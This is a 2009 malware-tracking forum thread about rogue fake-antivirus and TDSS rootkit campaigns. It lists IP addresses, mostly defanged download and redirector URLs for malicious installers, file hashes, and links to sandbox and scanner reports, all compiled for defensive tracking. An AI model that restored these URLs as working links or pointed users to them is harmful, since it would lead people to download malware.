Malware Domain List

Malware Related => Malicious Domains => Topic started by: Malware-Web-Threats on April 11, 2009, 10:29:19 pm

Title: Rogue - Fake AV
Post by: Malware-Web-Threats on April 11, 2009, 10:29:19 pm
64.146.2.92

Code: [Select]
hxxp://scanplus4.info/download/install.php
hxxp://newscan4.info/download/install.php

VirusTotal: TDSS - InternetAntivirus (http://www.virustotal.com/analisis/2b7425b937e24f9d0009a5cba82ec59c) 5/40 (12.5%)

Second payload (Anubis (http://anubis.iseclab.org/?action=result&task_id=18ad679545f16b35485f114e868a93dd4))

Code: [Select]
hxxp://in4tk.com/download/file.exe
hxxp://in4tk.com/download/InternetAntivirusPro.exe

file.exe VirusTotal: Trojan Hiloti (http://www.virustotal.com/analisis/647005a9fa751e0b1b9d0b48d1a54d66) 7/38 (18.43%)

InternetAntivirusPro.exe VirusTotal: Fake AV (http://www.virustotal.com/analisis/174f703f5c3564354fc754a1ac0a8ac3) 2/39 (5.13%)

Redirector: gosidescan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 11, 2009, 10:40:54 pm
209.44.126.14 - Fake Antivirus

Code: [Select]
hxxp://anytoplikedsite.com/download.php
hxxp://anytoplikedsite.com/installpv.exe
hxxp://topsecurity4you.com/download.php
hxxp://topsecurity4you.com/installpv.exe
hxxp://cleanyourpcspace.com/download.php
hxxp://cleanyourpcspace.com/installpv.exe
hxxp://fullsecurityshield.com/download.php
hxxp://fullsecurityshield.com/installpv.exe

VirusTotal (http://www.virustotal.com/analisis/df25331e818c6b213ffe315c87ea1890) 13/40 (32.50%)
VirusTotal (http://www.virustotal.com/analisis/5e62735e2c55f532e7383569e072af55) 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/05b212b5e1a2a50338795823e803628f) 5/40 (12.5%)
VirusTotal (http://www.virustotal.com/analisis/f74c35455505150ed5281c17750bbbc7) 6/40 (15%)
installpv.exe - VirusTotal (http://www.virustotal.com/analisis/dc35f4aae92e2a8b02437038fd6d8a9c) 6/40 (15%)

Title: Re: Rogue - Fake AV
Post by: MysteryFCM on April 11, 2009, 11:01:28 pm
Cheers :)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 12, 2009, 11:30:08 pm
66.197.154.199

Code: [Select]
hxxp://log6scan.info/download/install.php
hxxp://scan6log.info/download/install.php
hxxp://mainscan6.info/download/xp/install.php


VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/6229a9646da127ab2d84585f2ff98d5a) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8c028efd93b7058fad83d7dfecabed0b) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/1bc94e3cf26b5fcdafc7f0f50d9527ea) 4/40 (10%)

63.146.2.92

Code: [Select]
hxxp://newscan4.info/download/install.php
hxxp://scansafe4.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a0d6944c6cde4786e3494f7e94acefaa) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/9a0230392dd6a716ed22064768040fa2) 7/40 (17.5%)

209.44.126.14


Code: [Select]
hxxp://trustsecurityshield.com/download.php
hxxp://trustsecurityshield.com/install/ws.zip
hxxp://trustsecurityshield.com/install/installpv.exe

VirusTotal: Trojan (http://www.virustotal.com/analisis/c36808fb4e5405239e3c69903da3d419) 7/40 (17.5%)
VirusTotal: Fake AV (http://www.virustotal.com/analisis/24ad9b32085ff2e997f88b79c697ccc8) 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/37ba409a00f74d1dbfb930a6cba5f770) 3/40 (7.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 12, 2009, 11:39:48 pm
66.197.154.199

Code: [Select]
hxxp://gen6in.com/download/file.exe
hxxp://gen6in.com/download/InternetAntivirusPro.exe
hxxp://Gen6iz.com/download/file.exe
hxxp://Gen6iz.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/43efd3285739aebaecd94a0cae489682) 4/40 (10%)
VirusTotal: FakeAV (http://www.virustotal.com/analisis/d64c76e6dbe9e0dfcd76258bbb2f7f31) 2/40 (5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/c7697967dea8e7a9cd161f3b30d9ea67) 4/40 (10%)
VirusTotal: FakeAV (http://www.virustotal.com/analisis/d64c76e6dbe9e0dfcd76258bbb2f7f31) 2/40 (5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 03:56:43 am
66.197.154.199

Code: [Select]
hxxp://main6scan.info/download/install.php
hxxp://scanlog6.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b007bb8acaa4c8a53a140383b8a3ccb8) 6/40 (15%)

Same file

File size: 40960 bytes
MD5: b1467bfa3a5bd8a50d95ca543e296799
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 08:06:50 am
redirection

209.200.124.200

Code: [Select]
hxxp://bikervoice.com/index.php?option=com_content&view=category&id=1&Itemid=50

redirection

212.24.54.3
Code: [Select]
hxxp://traf.ws/?p=fattaft

91.212.65.10 (fake scan page)

Code: [Select]
hxxp://free-web-scaners.info/disk/?code=170
hxxp://free-web-scaners.info/scan/?

91.212.65.10 (fake av)

Code: [Select]
hxxp://trucount3000.com/cgi-bin/install.pl?adv=170
install.exe VirusTotal: Trojan (http://www.virustotal.com/analisis/5e4ad3f3a3acd0b674a2c2a4b02dce9e) 5/40 (12.5%)

file renamed to frmwrk32.exe after infection (Anubis Analysis (http://anubis.iseclab.org/?action=result&task_id=1f2938d6c2b8c17a4cd4c8682a418a4b9&format=html))

Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=ec2106602e38a6c4d5208a74576bf78d&t=1239610232&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 11:19:04 am
91.212.41.96

Redirect to rogue - Wepawet Analysis (http://wepawet.iseclab.org/view.php?hash=b44bd6dd8d8f2d9aebaa6b271a495208&t=1239620369&type=js)

Code: [Select]
http://xh.kaktotak.net/in.cgi?9&tsk=id778-29mar09-r35
63.146.2.92

Code: [Select]
hxxp://scantool4.info/download/install.php
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/39cc361882f1ca3ce8728d0ea0f880a8) - 8/40 (20%)

66.197.154.199

Code: [Select]
hxxp://scan6step.com/download/install.php
hxxp://scanlite6.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b132c3e3109c2f30be0774301a40da25) - 8/40 (20%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a85b854615752b3c72162cdca18f53f3) - 8/40 (20%)

91.212.41.110

Another redirection: Wepawet Analysys (http://wepawet.iseclab.org/view.php?hash=6ef685a373c71e09d719408269632007&t=1239621000&type=js)

Code: [Select]
hxxp://ysh.soulmosp.cn/in.cgi?9&tsk=id775-27mar09-r35
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 02:43:40 pm
63.146.2.92

Redirectors to rogue

Code: [Select]
hxxp://gomindscan.com

66.197.154.199

Code: [Select]
hxxp://goluxscan.com

Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=3b419b6481f138ecc0c495e7e7cd0a1f&t=1239633669&type=js)
Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=34d3a2e92e2fc8eb96b7688d3de1f6f2&t=1239634051&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 03:19:16 pm
84.16.227.223

Code: [Select]
hxxp://theonlinesecurityscan.com/download.php
hxxp://theonlinesecurityscan.com/download/ws.zip
hxxp://theonlinesecurityscan.com/download/installpv.exe

VirusTotal: Trojan (http://www.virustotal.com/analisis/5a9c5f8a32534e68e35fb42644c059bf) 10/40 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/e58dce968ffbf9f74abe93dd617cc79f) 13/40 (32.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/624ac92fd39089c5e783ef356a840c1e) 8/40 (20.00%)

Redirectors

Code: [Select]
hxxp://theonlinesecurityscan.com/hitin.php

195.88.81.93 - Fake Scanner Page

Code: [Select]
hxxp://msscanner-top-av.com/200109/scan/

78.26.179.137

Code: [Select]
hxxp://files.ms-loads-av.com/exe/setup_1_2_1.exe

VirusTotal: Fake AV (http://www.virustotal.com/analisis/dcde499dcb9d2360c27856061f020467) 5/40 (12.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 05:06:22 pm
209.44.26.14 - Rogue Fake Antivirus

Code: [Select]
hxxp://securityscan4you.com/download.php
hxxp://securityscan4you.com/install/installpv.exe
hxxp://securityscan4you.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/e27c5ec2b75919898955d65b73ae5782) 12/37 (32.44%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/e068d423582e107728b7f2181d96618c) 9/36 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/89e77f3332a27b98b66f881abf55d897) 15/37 (40.55%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 06:55:58 pm
66.197.154.199 - Redirectors

Code: [Select]
hxxp://gotipscan.com
hxxp://goscanlux.com

66.197.154.199 - Payload

Code: [Select]
hxxp://scan6lite.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/c315fd8eaa8549b8daba580ac93cf12d) 13/39 (33.34%)

66.206.17.28 - Payload

Code: [Select]
hxxp://scan6user.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/ced0f60d868305feb1f530e6a80d49ce) 27/40 (67.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 09:42:09 pm
63.146.2.92 (Fake Antivirus)

Code: [Select]
hxxp://tool4scan.info/download/install.php
VirusTotal: Trojan TDSS / InternetAntivirusPro (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 14, 2009, 06:36:00 pm
63.146.2.92 - Rogue Fake AV

Code: [Select]
hxxp://scan4mini.com/download/install.php
hxxp://scan4star.com/download/install.php

Same file

File Name: install.exe
MD5: d6d929af1d4e28b43122a820f87d85dc

1) Anubis (http://anubis.iseclab.org/?action=result&task_id=1f788572cf84921244d32781ab94beb4f)
2) Anubis (http://anubis.iseclab.org/?action=result&task_id=17a15ba42dace599445c104e6faac1e99)

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8cdb1fe0d3500cf6581c3c34c80b7791) 10/39 (25.65%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 01:41:58 pm
209.44.126.14

Redirector:

Code: [Select]
hxxp://firstscansecurity.com/hitin.php
hxxp://firstscansecurity.com/in.php
hxxp://firstscansecurity.com/page.php

Trojan:

Code: [Select]
hxxp://firstscansecurity.com/download.php
hxxp://firstscansecurity.com/install/installpv.exe
hxxp://firstscansecurity.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/4db44261d088d917fe55b53f0ffdb8a9) - 28/40 (70%)
VirusTotal (http://www.virustotal.com/analisis/474a72b41e85912ed15b1f66b18cb869) - 2/39 (5.13%)
VirusTotal:  (http://www.virustotal.com/analisis/cc7b6f910c8049b7066813b38a8ea2dc) - 4/40 (10%)

Redirector:

Code: [Select]
hxxp://myfirstsecurityscan.com/hitin.php
hxxp://myfirstsecurityscan.com/in.php
hxxp://myfirstsecurityscan.com/page.php

Trojan:

Code: [Select]
hxxp://myfirstsecurityscan.com/download.php
hxxp://myfirstsecurityscan.com/install/installpv.exe
hxxp://myfirstsecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/d8ba9f461692ddc1014c9ff0da277310) - 17/40 (42.5%)
VirusTotal (http://www.virustotal.com/analisis/a549b933c0311b55860af247a359a6c0) - 2/10 (5%)
VirusTotal (http://www.virustotal.com/analisis/ced1d1be0318905018c3e6fea23d025d) - 13/40 (32.5%)

Redirector:

Code: [Select]
hxxp://mytopvirusscan.com/hitin.php
hxxp://mytopvirusscan.com/in.php
hxxp://mytopvirusscan.com/page.php

Trojan:

Code: [Select]
hxxp://mytopvirusscan.com/download.php
hxxp://mytopvirusscan.com/install/installpv.exe
hxxp://mytopvirusscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/ae5730b115601f2b952d96745c612295) - 19/40 (47.5%)
VirusTotal (http://www.virustotal.com/analisis/1a45287af735ce8efb61bc2d3b6f5f12) - 2/40 (5%)
VirusTotal (http://www.virustotal.com/analisis/9042dc1411738ca21ddb819a4f30b7eb) - 14/40 (35%)

84.16.227.223

Code: [Select]
hxxp://theonlinesecurityscan.com/download.php
hxxp://theonlinesecurityscan.com/install/installpv.exe
hxxp://theonlinesecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/9a842d3d0c31dd4cfac260d54946947e) - 26/40 (65%)
VirusTotal (http://www.virustotal.com/analisis/a30a006b419e7254cf280204a5ef21da) - 2/40 (5%)
VirusTotal (http://www.virustotal.com/analisis/377d2134ec0d5eb3b56516a77cacf919) - 1/40 (2.5%)

194.165.4.41

Code: [Select]
hxxp://scanbest6.com/download/install.php

VirusTotal (http://www.virustotal.com/analisis/b01f7d1ff1f47b50dfaf33b74c2d3540) - 16/40 (40%)

63.146.2.92

Code: [Select]
hxxp://scanmix4.com/download/install.php

VirusTotal (http://www.virustotal.com/analisis/a0f1dca3e0e896ee1b72a95fd33c9eef) - 13/40 (32.50%)

66.197.154.199 - Redirect to rogue

Code: [Select]
hxxp://gofanscan.com

91.212.41.110 - Redirect to rogue

Code: [Select]
hxxp://goldrushclub.cn/in?cgi?6
hxxp://anti.greenhistory.cn/in.cgi?6

91.212.41.111 - Redirect to rogue

Code: [Select]
hxxp://a.goldrushclub.cn/in?cgi?6
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 01:51:46 pm
All on the same IP - 66.197.154.199

Redirect to rogue websites

Code: [Select]
hxxp://gorayscan.com
hxxp://goscanlite.com
hxxp://goscanmini.com
hxxp://godatascan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 04:47:11 pm
66.206.17.28

Code: [Select]
hxxp://step6scan.com/download/install.php

install.exe

File Size: 41472 Bytes
MD5: 260dc5b80c0dcaf57722e25fe9bf78d1

VirusTotal: Trojan (http://www.virustotal.com/analisis/456fd036a5137dc3b26d1c2041f954c7) - 9/40 (22.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=183da5cb836cfe604b51f7c5827f6f62e&format=html)

66.206.17.29

Second download

Code: [Select]
hxxp://in6sd.com/download/file.exe
hxxp://in6sd.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2945d18a615889b7a7f6299f7c0b44e3) - 34/40 (85%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/5260f5a9e70d9840355933ad60a9a843) - 8/39 (20.52%)

Code: [Select]
hxxp://in6iq.com/download/file.exe
hxxp://in6iq.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/f97379c7ddef5f997c65915113728eea) - 7/40 (17.5%)
VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/59a68cfb41452c7f2ce4efcc6d5083b4) - 7/40 (17.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 17, 2009, 02:19:57 am
Rootkit TDSS variants

66.197.154.199

Code: [Select]
hxxp://any6scan.com/download/xp/install.php
hxxp://anyscan6.info/download/install.php
hxxp://scan6data.com/download/xp/install.php
hxxp://scan6base.info/download/install.php

File size: 40960 bytes
MD5: 93037e2f0ed5dd6ffcbef36cc3783537

Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1290937cc0a3f73e485c74dd48f041189)

VirusTotal (http://www.virustotal.com/analisis/719eb17e9616e076788f53361270c6b6) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/c2f494417dc44f48b8ec3f0bdc878ba7) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/4544f9778ea9133dffaa8747476049c7) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/d59f0d3e09ba5ae103f42376ccec7a94) - 6/40 (15%)

66.206.17.28

Code: [Select]
hxxp://scantrue6.com/download/install.php

File size: 40960 bytes
MD5: a6ae9b2378b16cc260012401449b0cf6

Anubis report (http://anubis.iseclab.org/?action=result&task_id=11853dcfb88f34fc4d5cb98ce9c4440fd)

VirusTotal (http://www.virustotal.com/analisis/e627b276b354177e323b65bd7ada3d2e) - 6/40 (15%)

63.146.2.92

Code: [Select]
hxxp://scanmix4.com/download/install.php

File size: 40960 bytes
MD5: 218f1314b96d1b5a475bf228f53da63c

Anubis report (http://anubis.iseclab.org/?action=result&task_id=14293f27773ee8c0489e1cd9349bff174&call=first)

VirusTotal (http://www.virustotal.com/analisis/3baf77a42569f04d49ea98ff8cbdb188) - 14/38 (36.85%)

Redirectors:

66.197.154.199

Code: [Select]
hxxp://goscanfan.com
hxxp://gostarscan.com
hxxp://gominiscan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 17, 2009, 02:43:03 am
209.44.126.14

Code: [Select]
hxxp://totalvirusdestroyer.com/download.php
hxxp://totalvirusdestroyer.com/install/installpv.exe
hxxp://totalvirusdestroyer.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/58d418cecb71eb0c4092dcb74407f6ca) - 18/38 (47.37%)
VirusTotal (http://www.virustotal.com/analisis/edb14b669e29b4ef17e03a20711753c8) - 10/38 (26.32%)
VirusTotal (http://www.virustotal.com/analisis/9394263ebcaf0d4ec9b6f5cda69227fc) - 18/38 (47.37%)

91.212.65.55

Code: [Select]
hxxp://globalsecurityscan.com/download.php
hxxp://globalsecurityscan.com/install/installpv.exe
hxxp://globalsecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/51c490f1d434204240a07798378f7a22) - 11/40 (27.5%)
VirusTotal (http://www.virustotal.com/analisis/884001f46db7c19a7dff265d69671f9c) - 7/40 (17.5%)
VirusTotal (http://www.virustotal.com/analisis/293d26b1c8c142eccfa81e100fe7d9ba) - 11/40 (27.5%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 17, 2009, 06:09:52 pm
195.88.81.74

Code: [Select]
files.scanner-antispy-av-files.com/exe/setup_200002.exe
http://www.virustotal.com/analisis/7cc2a0083ed4c8c466656b9a70fb7b2f 9/39
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 03:46:40 am
209.44.126.14

Redirectors:
Code: [Select]
hxxp://fastviruscleaner.com/hitin.php
hxxp://fastviruscleaner.com/in.php
hxxp://fastviruscleaner.com/page.php

Payloads:
Code: [Select]
hxxp://fastviruscleaner.com/download.php
hxxp://fastviruscleaner.com/install/installpv.exe
hxxp://fastviruscleaner.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/7c4d3ad2c77e7b330b970b352fcaa56d) - 9/40 (22.50%)
VirusTotal (http://www.virustotal.com/analisis/05720fdbb452644261d387d57b9ac93d) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/fd1a256533a5870d935caa77c7aadd59) - 11/40 (27.5%)

Redirectors:
Code: [Select]
hxxp://destroyvirusnow.com/hitin.php
hxxp://destroyvirusnow.com/in.php
hxxp://destroyvirusnow.com/page.php

Payloads:
Code: [Select]
hxxp://destroyvirusnow.com/download.php
hxxp://destroyvirusnow.com/install/installpv.exe
hxxp://destroyvirusnow.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/b5894f5697df35132d96cc7eab44d833) - 13/40 (32.5%)
VirusTotal (http://www.virustotal.com/analisis/62c2f4546700f5dcbfe68b17f4338946) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/a5b9869a89f1f4ad57cae7d0b658463d) - 16/40 (40%)

Redirectors:
Code: [Select]
hxxp://totalvirusdestroyer.com/hitin.php
hxxp://totalvirusdestroyer.com/in.php
hxxp://totalvirusdestroyer.com/page.php

Payloads:
Code: [Select]
hxxp://totalvirusdestroyer.com/download.php
hxxp://totalvirusdestroyer.com/install/installpv.exe
hxxp://totalvirusdestroyer.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/60e0d43a162def97b6fe02e55fb95cb2) - 10/40 (25%)
VirusTotal (http://www.virustotal.com/analisis/640dbfe7e4b70beec9deb70d184fc059) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/a06e33fcd13381e77c647eea571cce7e) - 21/40 (52.5%)

66.197.154.199

Code: [Select]
hxxp://scanany6.info/download/install.php

Anubis report (http://anubis.iseclab.org/?action=result&task_id=1165a1bcf2ab5686481319b3b8cdbc986)
VirusTotal (http://www.virustotal.com/analisis/7bf992c7d137c0a7ec25467e615e1a53) - 8/40 (20%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 10:16:50 am
Trojan FakeSpyguard - TDSS

211.95.73.189

Redirectors:
Code: [Select]
hxxp://dlsg09.com/sysgd09/setup.php
hxxp://dlsg09.com/maldef09/setup.php
hxxp://dlsgd3.com/sysgd09/setup.php
hxxp://dlsgd3.com/maldef09/setup.php
hxxp://getsgd3.com/sysgd09/setup.php
hxxp://getsgd3.com/maldef09/setup.php
hxxp://getsysgd09.com/sysgd09/setup.php
hxxp://getsysgd09.com/maldef09/setup.php
hxxp://dlmaldef092.com/maldef09/install.php
hxxp://dlmaldef092.com/sysgd09/install.php
hxxp://gomaldef092.com/sysgd09/setup.php
hxxp://gosgd3.com/sysgd09/setup.php
hxxp://systemguard2009.com/download/
hxxp://malwaredefender2009.com/download/

211.95.73.189

Fake scanner page:
Code: [Select]
hxxp://scan.systemcleaner22.com

84.16.243.169 / 78.159.122.59 / 84.16.251.222

Payload:
Code: [Select]
hxxp://84.16.243.169/sysgd09/setup.php
hxxp://84.16.243.169/maldef09/setup.php
hxxp://78.159.122.59/sysgd09/setup.php
hxxp://78.159.122.59/maldef09/setup.php
hxxp://84.16.251.222/sysgd09/install.php
hxxp://84.16.251.222/maldef09/setup.php

SystemGuard2009.exe

File size: 2674176 bytes
MD5: f36cfbf9d5d5489776564044645b70ef

VirusTotal (http://www.virustotal.com/analisis/8e9a80555cfba290713d4500856552fe) 20/40 (50%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 10:56:24 am
TDSS variants

66.206.17.28
Code: [Select]
hxxp://scandata6.com/download/xp/install.php
VirusTotal (http://www.virustotal.com/analisis/5fc3eb54866d3f6185691cd4eeed6234) - 7/40 (17.5%)

63.146.2.92
Code: [Select]
hxxp://scan4easy.info/download/xp/install.php
VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.5%)

Code: [Select]
hxxp://scan6atom.info/download/install.php
VirusTotal (http://www.virustotal.com/analisis/ad2c87ab20d78381e9d844908d6f666d) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 19, 2009, 05:01:26 pm
66.206.17.28

Same file: Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c72815202ebddee4a5a1f7c26bed8ebb)

File size: 40960 bytes
MD5: 231dec812f74b0b268d9370b89a7c491

Code: [Select]
hxxp://base6scan.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/65f8c12e86da01ba426dd2916e2106ae) - 9/40 (22.5%)
Code: [Select]
hxxp://justscan6.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/652a58e66cae04eb0994f496943967b4) - 10/40 (25%)

Code: [Select]
hxxp://just6scan.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/839fbcaf8610fa23a9e1a82d54db837c) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 19, 2009, 08:49:52 pm
38.103.173.98

Code: [Select]
dwnld.offer-provider.com/secure/ecd53ab0b17e571df611d1ba513f2153/49eb89c9/srm/srm_free_setup.exe
174.36.195.17

Code: [Select]
dwnld.promotion-offer.com/secure/ecd53ab0b17e571df611d1ba513f2153/49eb89c9/srm/srm_free_setup.exe
http://www.virustotal.com/analisis/1a2775049bd5ccd487cafaa37545b041 7/40
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 19, 2009, 09:31:42 pm
174.36.195.17

Code: [Select]
dwnld.toppromooffer.com/secure/3f46e898cbfe2f66fc3ca1d798f71ad8/49eb8fa5/vsm/vsm_free_setup.exehttp://www.virustotal.com/analisis/26be3f85286b0734f235f5fc95f80e26 30/39

Code: [Select]
dwnld.toppromooffer.com/secure/fc744120baa2682ca3a444edf14d187b/49eb889e/cln/cln_free_setup.exehttp://www.virustotal.com/analisis/041ffd652d6134c35eb65a6743b18196 2/40

Code: [Select]
dwnld.toppromooffer.com/secure/4c9abc6b3dd24601d386633223f70e35/49eb8e79/srm/srm_free_setup1603.exehttp://www.virustotal.com/analisis/8063e36751f873a510949769b1f839ef 13/40

Code: [Select]
dwnld.toppromooffer.com/secure/13e96273b72b50a4bb226d782f555124/49eb8e79/srm/srm_free_setup1602.exehttp://virscan.org/report/797db2b5fcd0354f6fe88c0d15f6ba87.html 7/38

Code: [Select]
dwnld.toppromooffer.com/secure/c5c929bd78d623f3c8e2a68a7d0fb5f1/49eb82c1/sec/sec_free_setup.exehttp://www.virustotal.com/analisis/39bb1fca3de4e29d1cd294f5af935afc 18/40
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 19, 2009, 10:04:34 pm
66.206.17.28

Same file

File name: install.exe
File size: 40960 bytes
MD5: 231dec812f74b0b268d9370b89a7c491

Code: [Select]
hxxp://scanjust6.info/download/install.php
hxxp://scan6just.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/979eb25325ad491f36084be0252e7bf1) - 10/40 (25%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/839fbcaf8610fa23a9e1a82d54db837c) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 20, 2009, 12:28:23 am
Redirects to rogue websites (change every 72 hours)

66.96.131.13

Code: [Select]
hxxp://texasvino.com

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=bd5e815ea24d230a6b6a547c39d56a3d&t=1240187169&type=js)

88.214.204.180

Code: [Select]
hxxp://info4us.info/in.php?v=28

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=7ad4c2e7b6a32cbd2a95c99fa86fb715&t=1240184561&type=js)

88.214.198.241

Code: [Select]
hxxp://onlyfind.net/in.cgi?3

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=83e6761e7ec3a37012d9786a29e1935b&t=1240178214&type=js)

91.212.41.110 / 91.212.41.111

Code: [Select]
hxxp://liteauction.cn/in.cgi?6
hxxp://newtransfer.cn/in.cgi?6
hxxp://workfuse.cn/in.cgi?6

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=5d61b052da01a3f1ae5fa54de77c448a&t=1240187024&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=be3d8b9bcd4972859e074d0a6312660b&t=1240174926&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=6f6dcbbd7ee6e50d0a646bf60d0c2199&t=1240186868&type=js)

87.248.163.58

Code: [Select]
hxxp://87.248.163.58/in.php?s=texasvino.com

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=af233eaa9acc39865ddc62287d3138d2&t=1240186884&type=js)

87.248.163.58

Code: [Select]
hxxp://098765.com/in.php
hxxp://999666999.com/in.php
hxxp://berrousmark2009.com/in.php
hxxp://dbytedelicious.com/in.php
hxxp://dbytedelicious.net/in.php
hxxp://dbytedelicious.org/in.php
hxxp://hola-aloha.net/in.php
hxxp://infidelirium.com/in.php
hxxp://infidelirium.info/in.php (not responding)
hxxp://infidelirium.net/in.php
hxxp://infidelirium.org/in.php
hxxp://lastpoher.ru/in.php
hxxp://massmarker2009.com/in.php
hxxp://murtinreid.com/in.php
hxxp://murtinreid.net/in.php
hxxp://sendsometraff.com/in.php
hxxp://x-more-x.net/in.php
hxxp://zerromark2009.com/in.php
hxxp://zorroless.com/in.php

Example:

Code: [Select]
hxxp://dbytedelicious.com/in.php

Wepawet  (http://wepawet.cs.ucsb.edu/view.php?hash=104a4dda02430272b2f93348cb4fa43b&t=1240187557&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 20, 2009, 07:45:31 am
Trojan TDSS variant on 66.206.17.28

Code: [Select]
hxxp://datascan4.info/download/install.php
hxxp://data4scan.info/download/install.php
hxxp://data6scan.info/download/install.php
hxxp://easyscan4.info/download/install.php
hxxp://easy4scan.info/download/xp/install.php
hxxp://ever4scan.info/download/install.php
hxxp://everscan4.info/download/install.php
hxxp://ever6scan.info/download/install.php
hxxp://everscan6.info/download/xp/install.php
hxxp://scaneasy4.info/download/install.php
hxxp://scaneasy6.info/download/xp/install.php

VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.50%)
